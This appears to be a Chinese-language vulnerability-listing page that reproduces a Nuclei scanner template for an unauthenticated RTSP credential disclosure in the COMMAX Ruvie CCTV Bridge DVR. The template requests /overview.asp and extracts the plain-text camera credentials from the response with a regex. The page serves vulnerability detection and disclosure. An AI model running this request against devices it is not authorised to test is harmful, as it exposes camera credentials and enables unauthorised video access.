commax-credentials-disclosure: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure

日期: 2025-08-01 | 影响软件: COMMAX Smart Home Ruvie CCTV Bridge DVR | POC: 已公开

漏洞描述

The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.

PoC代码[已公开]

id: commax-credentials-disclosure

info:
  name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
  author: gy741
  severity: critical
  description: |
    The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
  metadata:
    max-request: 1
  tags: commax,exposure,camera,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/overview.asp"

    matchers:
      - type: word
        part: body
        words:
          - "DVR Lists"
          - "rtsp://"
          - "login_check.js"
          - "MAX USER :"
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'
# digest: 490a0046304402205c27743db95bb12e7b7f09a5a8c9f79d8e628ee85dc50e69e96552e3c52f1d0e0220317262681c1fd76379bc2f5697520cc72598101fbac4bcd61a2c75a39b05aa2c:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/commax-credentials-disclosure.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐